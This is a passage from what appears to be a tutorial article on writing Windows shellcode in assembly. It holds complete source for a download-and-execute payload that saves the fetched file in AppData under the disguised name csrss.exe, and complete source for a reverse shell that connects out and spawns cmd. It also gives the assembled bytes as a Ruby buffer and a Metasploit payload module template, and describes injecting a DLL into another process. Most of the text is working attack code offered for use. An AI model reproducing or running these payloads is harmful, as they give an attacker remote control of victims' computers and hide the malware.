Push Eax
Push Esi
Push URLOffset
Push Eax
Call URLDownloadToFileA
Mov Edi, Eax
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx
Push Edx
Push Eax
Push Eax
Push Eax
Push 1
Push Eax
Push Eax
Push Esi
Push Eax
Call CreateProcessA
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
URL DB "http://localhost:3000/1.exe", 90H
Filename DB "%appdata%\csrss.exe", 0

In this code, we call ExpandEnvironmentString API. This API expands the string that is similar to (%appdata%, %windir% and so on) to the equivalent path like (C:\Windows\...) from the Environment Variables.

This API is important if you need to write files to the Application Data or to the MyDocuments or inside the Windows system. So, we expand our filename to save the malicious file inside the application data (the best hidden folder that has the write access for Window Vista & 7) with name csrss.exe.

And then, we call URLDownloadFileA to download the malicious file and at last we execute it with CreateProcessA.

You can use a DLL file to download and to start using loadLibrary. And you can inject this library into another process by using WriteMemoryProcess and CreateRemoteThread.

You can inject the Filename string into another process and then call to CreateRemoteThread with LoadLibrary as the ProcAddress and the injected string as the argument of LoadLibrary API.

4.5 Put All Together

The code below is compiled using Masm and the editor is EasyCode Masm:

ASM
.Const
LoadLibraryAConst Equ 3A75C3C1H
CreateProcessAConst Equ 26813AC1H
WaitForSingleObjectConst Equ 0C4679698H
WSAStartupConst Equ 0EBD1EDFEH
WSASocketAConst Equ 0DD7C4481H
listenConst Equ 9A761FF0H
connectConst Equ 42C02958H
bindConst Equ 080FF799H
acceptConst Equ 0C9C4EFB7H
gethostbynameConst Equ 0F932AA6DH
recvConst Equ 06135F3AH
.Code
Assume Fs:Nothing
Shellcode:
GETDELTA:
Jmp NEXT
PREV:
Pop Ebx
Jmp END_GETDELTA
NEXT:
Call PREV
END_GETDELTA:
Mov Eax, Ebx
Mov Cx, (Offset END_GETDELTA - Offset MainShellcode)
Neg Cx
Add Ax, Cx
Jmp Eax
;Inputs:
;-------
;Esi --> Kernelbase
;Ebx -->The ArrayOfAPIs
GetAPIs Proc
Local AddressFunctions:DWord
Local AddressOfNameOrdinals:DWord
Local AddressNames:DWord
Local NumberOfNames:DWord
Getting_PE_Header:
Mov Edi, Esi ;Kernel32 imagebase
Mov Eax, [Esi].IMAGE_DOS_HEADER.e_lfanew
Add Esi, Eax ;Esi-->PE Header Edi-->MZ Header
Getting_Export_Table:
Mov Eax, [Esi].IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[0].VirtualAddress
Add Eax, Edi
Mov Esi, Eax
Getting_Arrays:
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
Add Eax, Edi
Mov AddressFunctions, Eax ;the first array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
Add Eax, Edi
Mov AddressOfNameOrdinals, Eax ;the second array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNames
Add Eax, Edi
Mov AddressNames, Eax ;the third array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.NumberOfNames
Mov NumberOfNames, Eax ;the number of APIs
Push Esi
Mov Esi, AddressNames
Xor Ecx, Ecx
GetTheAPIs:
Lodsd
Push Esi
Lea Esi, [Eax + Edi] ;RVA + imagebase = VA
Xor Edx,Edx
Xor Eax,Eax
Checksum_Calc:
Lodsb
Test Al, Al ;Avoid the null byte in Cmp Eax,0
Jz CheckFunction
IMul Eax, Edx
Xor Edx,Eax
Inc Edx
Jmp Checksum_Calc
CheckFunction:
Pop Esi
Xor Eax, Eax ;The index of this API
Cmp Edx, LoadLibraryAConst
Jz FoundAddress
Inc Eax
Cmp Edx, CreateProcessAConst
Jz FoundAddress
Inc Eax
Cmp Edx, WaitForSingleObjectConst
Jz FoundAddress
Inc Eax
Cmp Edx, WSAStartupConst
Jz FoundAddress
Inc Eax
Cmp Edx, WSASocketAConst
Jz FoundAddress
Inc Eax
Cmp Edx, listenConst
Jz FoundAddress
Inc Eax
Cmp Edx, connectConst
Jz FoundAddress
Inc Eax
Cmp Edx, bindConst
Jz FoundAddress
Inc Eax
Cmp Edx, acceptConst

Jz FoundAddress
Inc Eax
Cmp Edx, gethostbynameConst
Jz FoundAddress
Inc Eax
Cmp Edx, recvConst
Jz FoundAddress
Xor Eax, Eax
Inc Ecx
Cmp Ecx, NumberOfNames
Jz EndFunc
Jmp GetTheAPIs
FoundAddress:
Mov Edx, Esi ;save it temporary in edx
Pop Esi ;Esi --> PE Header
Push Ecx
Push Eax ;save the index of the API
Mov Eax, AddressOfNameOrdinals
Movzx Ecx, Word Ptr [Eax + Ecx * 2]
Mov Eax, AddressFunctions
Mov Eax, DWord Ptr [Eax + Ecx * 4]
Add Eax, Edi
Pop Ecx ;Get The Index of the API
Mov [Ebx + Ecx * 4], Eax
Pop Ecx
Inc Ecx
Push Esi
Mov Esi, Edx
Jmp GetTheAPIs
EndFunc:
Mov Esi, Edi
Ret
GetAPIs EndP
MainShellcode Proc
Local recv:DWord
Local gethostbyname:DWord
Local accept:DWord
Local bind:DWord
Local connect:DWord
Local listen:DWord
Local WSASocketA:DWord
Local WSAStartup:DWord
Local WaitForSingleObject:DWord
Local CreateProcessA:DWord
Local LoadLibraryA:DWord
Local DataOffset:DWord
Local WSAStartupData:WSADATA
Local socket:DWord
Local sAddr:sockaddr_in
Local Startup:STARTUPINFO
Local ProcInfo:PROCESS_INFORMATION
Local Ali:hostent
Add Bx, Offset DATA - Offset END_GETDELTA
Mov DataOffset, Ebx
;-----------------------------------------
;Getting Kernel Imagebase
;-----------------------------------------
Xor Ecx, Ecx
Add Ecx, 30H
Mov Eax, DWord Ptr Fs:[Ecx]
Mov Eax, DWord Ptr [Eax + 0CH]
Mov Ecx, DWord Ptr [Eax + 1CH]
Mov Ecx, DWord Ptr [Ecx]
Mov Esi, DWord Ptr [Ecx + 8H]
;-----------------------------------------
;Getting APIs
;-----------------------------------------
Lea Ebx, LoadLibraryA
Call GetAPIs
Xor Eax, Eax
Mov Ax, '23'
Push Eax
Push '_2SW'
Push Esp
Call LoadLibraryA
Mov Esi, Eax
Call GetAPIs
;-----------------------------------------
;Payload : Reverse Shell
;-----------------------------------------
Lea Eax, WSAStartupData
Push Eax
Push 190H
Call WSAStartup ;call to WSAStartup to start the connections
Xor Eax, Eax
Push Eax ;Flags = 0
Push Eax ;Group = 0
Push Eax ;pWSAprotocol = NULL
Push Eax ;Protocol = IPPROTO_IP
Push SOCK_STREAM
Push AF_INET
Call WSASocketA ;Create our socket 
(your phone who will connect or listen to/from the client
Mov Edi, Eax ;save it in Edi
Xor Esi, Esi
Mov Ebx, DataOffset
Mov Cx, Word Ptr [Ebx]
Mov sAddr.sin_port, Cx ;Port Number
Mov sAddr.sin_family, AF_INET
Inc Ebx
Inc Ebx
Push Ebx
Call gethostbyname
Mov Ebx, [Eax + 1CH] ;IP
Mov sAddr.sin_addr, Ebx
Lea Eax, sAddr
Push SizeOf sAddr
Push Eax
Push Edi
Call connect
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Startup.hStdInput, Edi
Mov Startup.hStdOutput, Edi
Mov Startup.hStdError, Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Push Ax
Mov Al, 'D'
Push Eax
Mov Ax, 'MC'
Push Ax
Mov Eax, Esp
Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx
Push Edx
Push Esi
Push Esi
Push Esi
Push 1
Push Esi
Push Esi
Push Eax
Push Esi
Call CreateProcessA
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
Port DW 5C11H ;5C11H == 4444 (port 4444)
IP DB "127.0.0.1", 0
End Shellcode

In this code, we began by getting the delta and jump to MainShellcode. This function begins by getting the APIs from kernel32.dll and then Loads ws2_32.dll with LoadLibraryA and gets its APIs.

Then, it begins its payload normally and connects to the attacker and spawns the shell.

This code is null free byte. It includes only one byte and it’s the last byte (the terminator of the string).

Now, we will see how to setup your shellcode into Metasploit to be available for using into your exploits.

5. Part 4: Implement your Shellcode into Metasploit

In this part, I will use the Download & Execute Shellcode to implement it into Metasploit. To implement your shellcode, you need first to convert it into ruby buffer like this:

Buf = "\xCC\xCC"+
"\xCC\xCC"

So, I converted my shellcode into Ruby Buffer like this (without the 2 strings: URL, Filename):

"\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF"+
"\xFF\xFF\x8B\xC3\x66\xB9\x3F\xFF"+
"\x66\xF7\xD9\x66\x03\xC1\xFF\xE0"+
"\x55\x8B\xEC\x83\xC4\xF0\x8B\xFE"+
"\x8B\x46\x3C\x03\xF0\x8B\x46\x78"+
"\x03\xC7\x8B\xF0\x8B\x46\x1C\x03"+
"\xC7\x89\x45\xFC\x8B\x46\x24\x03"+
"\xC7\x89\x45\xF8\x8B\x46\x20\x03"+
"\xC7\x89\x45\xF4\x8B\x46\x18\x89"+
"\x45\xF0\x56\x8B\x75\xF4\x33\xC9"+
"\xAD\x56\x8D\x34\x07\x33\xD2\x33"+
"\xC0\xAC\x84\xC0\x74\x08\x0F\xAF"+
"\xC2\x33\xD0\x42\xEB\xF3\x5E\x33"+
"\xC0\x81\xFA\xC1\xC3\x75\x3A\x74"+
"\x37\x40\x81\xFA\xC1\x3A\x81\x26"+
"\x74\x2E\x40\x81\xFA\x98\x96\x67"+
"\xC4\x74\x25\x40\x81\xFA\xC1\x37"+
"\xE1\x43\x74\x1C\x40\x81\xFA\xC1"+
"\xF7\x63\xBE\x74\x13\x40\x81\xFA"+
"\x58\x29\xC0\x42\x74\x0A\x33\xC0"+
"\x41\x3B\x4D\xF0\x74\x21\xEB\xA8"+
"\x8B\xD6\x5E\x51\x50\x8B\x45\xF8"+
"\x0F\xB7\x0C\x48\x8B\x45\xFC\x8B"+
"\x04\x88\x03\xC7\x59\x89\x04\x8B"+
"\x59\x41\x56\x8B\xF2\xEB\x89\x8B"+
"\xF7\xC9\xC3\x55\x8B\xEC\x83\xC4"+
"\x8C\x66\x81\xC3\x6F\x01\x89\x5D"+
"\xE4\x33\xC9\x83\xC1\x30\x64\x8B"+
"\x01\x8B\x40\x0C\x8B\x48\x1C\x8B"+
"\x09\x8B\x71\x08\x8D\x5D\xE8\xE8"+
"\x24\xFF\xFF\xFF\x33\xC0\x66\xB8"+
"\x6C\x6C\x50\x68\x6F\x6E\x2E\x64"+
"\x68\x75\x72\x6C\x6D\x54\xFF\x55"+
"\xE8\x8B\xF0\xE8\x08\xFF\xFF\xFF"+
"\x8B\x7D\xE4\x33\xC0\xB0\x90\xF2"+
"\xAE\x88\x67\xFF\x89\x7D\xE0\xB0"+
"\xC8\x2B\xE0\x8B\xF4\x50\x56\x57"+
"\xFF\x55\xF8\x33\xC0\x50\x50\x56"+
"\xFF\x75\xE4\x50\xFF\x55\xF4\x8B"+
"\xF8\x57\x33\xC9\xB1\x44\x8D\x7D"+
"\x9C\x33\xC0\xF3\xAA\xB1\x10\x8D"+
"\x7D\x8C\x33\xC0\xF3\xAA\x5F\xC6"+
"\x45\x9C\x44\x66\xC7\x45\xC8\x01"+
"\x01\x33\xC0\x8D\x4D\x8C\x8D\x55"+
"\x9C\x51\x52\x50\x50\x50\x6A\x01"+
"\x50\x50\x56\x50\xFF\x55\xEC\x6A"+
"\xFF\xFF\x75\x8C\xFF\x55\xF0\xC9"+
"\xC3"

I do that by using DataRipper and UltraEdit programs to create this string from the binary of the shellcode inside ollydbg. I use some find/replace and so on to reach this Shape.

After that, you should create your own ruby payload module. To do that, you will use this as a template and I’ll describe it now.

C++
##
# $Id: download_exec.rb 9488 2010-06-11 16:12:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# these are important
require 'msf/core'

#this is dependent of your shellcode type 
#(Exec for normal shellcodes without any command shell
require 'msf/core/payload/windows/exec'

module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single

#The Initialization Function
def initialize(info = {})
super(update_info(info,
'Name' => 'The Name of Your shellcode',
'Version' => '$Revision: 9488 $',
'Description' => 'The Description of your Shellcode',
'Author' => 'your name',
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Payload' =>
{
'Offsets' => { },
'Payload' =>
"\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF"+
"\xC3"
}
))

# EXITFUNC is not supported :/
deregister_options('EXITFUNC')

# Register command execution options
register_options(
[
OptString.new('URL', [ true, "The Description" ]),
OptString.new('Filename', [ true, "The Description" ])
], self.class)
end
#
# Constructs the payload
#
# You can get your parameters from datastore['Your Parameter']

def generate_stage
return module_info['Payload']['Payload'] + (datastore['URL'] || '') + 
    "\x90" + (datastore['Filename'] || '') + "\x00"
end
end

The code is hard to understand if you don’t know Ruby. But it’s very easy to work on it. You only need to modify it a little bit to be suitable for your shellcode.

To modify it, you should follow these steps:

  1. The first thing, you should add the information of your shellcode including the binary of your shellcode in Payload.
  2. Then, you will add your shellcode parameters in register_options with the description of it.
  3. And at last, you will modify the generate_stage function to generate your payload. You can get your parameters easily with datastore[‘Your Parameter’] and you can add it to the payload.
  4. Also, you can get your payload with module_info[‘Payload’][‘Payload’] and you can merge your parameters as shown in the sample.
  5. At the end, you will have your working shellcode. You should save the file inside its category like \msf3\modules\payloads\singles\windows to be inside the windows category.

If anything is still unclear, I added the metasploit modules of the shellcodes that we created into the sources. You can check them and try to modify them.

6. Conclusion

The 0-day exploits became the clue behind any new threat today. The key behind any successful exploit is its reliable shellcode.

We described in this article how to write your own shellcode, how to bypass the limitations of your shellcode like null free shellcode and Alphanumeric Shellcode and we described also how to implement your shellcode into metasploit to be easy to use inside your exploit.

7. References

  1. “Writing ia32 alphanumeric shellcodes” in Phrack
  2. “Understanding Windows Shellcode” by skape – 2003
  3. “Advanced Windows Debugging: Memory Corruption Part II—Heaps” By Daniel Pravat and Mario Hewardt - Nov 9, 2007

8. Appendix I – Important Structures

C++
typedef struct _PEB {
        BOOLEAN InheritedAddressSpace;     //+00
        BOOLEAN ReadImageFileExecOptions;     //+01
        BOOLEAN BeingDebugged;             //+02
        BOOLEAN Spare;                 //+03
        HANDLE Mutant;                 //+04
        PVOID ImageBaseAddress;         //+08
        PPEB_LDR_DATA LoaderData;         //+0C
        PRTL_USER_PROCESS_PARAMETERS ProcessParameters; //+10
        PVOID SubSystemData;             //+14
        PVOID ProcessHeap;             //+18
        PVOID FastPebLock;             //+1C
        PPEBLOCKROUTINE FastPebLockRoutine; //+20
        PPEBLOCKROUTINE FastPebUnlockRoutine; //+24
        ULONG EnvironmentUpdateCount;     //+28
        PPVOID KernelCallbackTable;         //+2C
        PVOID EventLogSection;             //+30
        PVOID EventLog;                 //+34
        PPEB_FREE_BLOCK FreeList;         //+38
        ULONG TlsExpansionCounter;         //+3C
        PVOID TlsBitmap;                 //+40
        ULONG TlsBitmapBits[0x2];         //+44
        PVOID ReadOnlySharedMemoryBase;     //+4C
        PVOID ReadOnlySharedMemoryHeap;     //+50
        PPVOID ReadOnlyStaticServerData;     //+54
        PVOID AnsiCodePageData;         //+58
        PVOID OemCodePageData;             //+5C
        PVOID UnicodeCaseTableData;         //+60
        ULONG NumberOfProcessors;         //+64
        ULONG NtGlobalFlag;             //+68
        BYTE Spare2[0x4];             //+6C
        LARGE_INTEGER CriticalSectionTimeout; //+74
        ULONG HeapSegmentReserve;         //+78
        ULONG HeapSegmentCommit;         //+7C
        ULONG HeapDeCommitTotalFreeThreshold;//+80
        ULONG HeapDeCommitFreeBlockThreshold;//+84
        ULONG NumberOfHeaps;             //+88
        ULONG MaximumNumberOfHeaps;         //+8C
        PPVOID *ProcessHeaps;             //+90
        PVOID GdiSharedHandleTable;
        PVOID ProcessStarterHelper;
        PVOID GdiDCAttributeList;
        PVOID LoaderLock;
        ULONG OSMajorVersion;
        ULONG OSMinorVersion;
        ULONG OSBuildNumber;
        ULONG OSPlatformId;
        ULONG ImageSubSystem;
        ULONG ImageSubSystemMajorVersion;
        ULONG ImageSubSystemMinorVersion;
        ULONG GdiHandleBuffer[0x22];
        ULONG PostProcessInitRoutine;
        ULONG TlsExpansionBitmap;
        BYTE TlsExpansionBitmapBits[0x80];
        ULONG SessionId;
} PEB, *PPEB;
typedef struct TIB
{
PEXCEPTION_REGISTRATION_RECORD* ExceptionList;     //FS:[0x00]
        dword StackBase;                          //FS:[0x04]
        dword StackLimit;                     //FS:[0x08]
        dword SubSystemTib;                     //FS:[0x0C]
        dword FiberData;                         //FS:[0x10]
        dword ArbitraryUserPointer;                 //FS:[0x14]
        dword TIB;                             //FS:[0x18]
};
typedef struct TEB {
        dword EnvironmentPointer;                 // FS:[1C]
        dword ProcessId;                         // FS:[20]
        dword threadId;                         // FS:[24]
        dword ActiveRpcInfo;                     // FS:[28]
        dword ThreadLocalStoragePointer;             // FS:[2C]
        PEB* Peb;                             // FS:[30]
        dword LastErrorValue;                     // FS:[34]
};

History

  • 4th February, 2012: Initial version

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)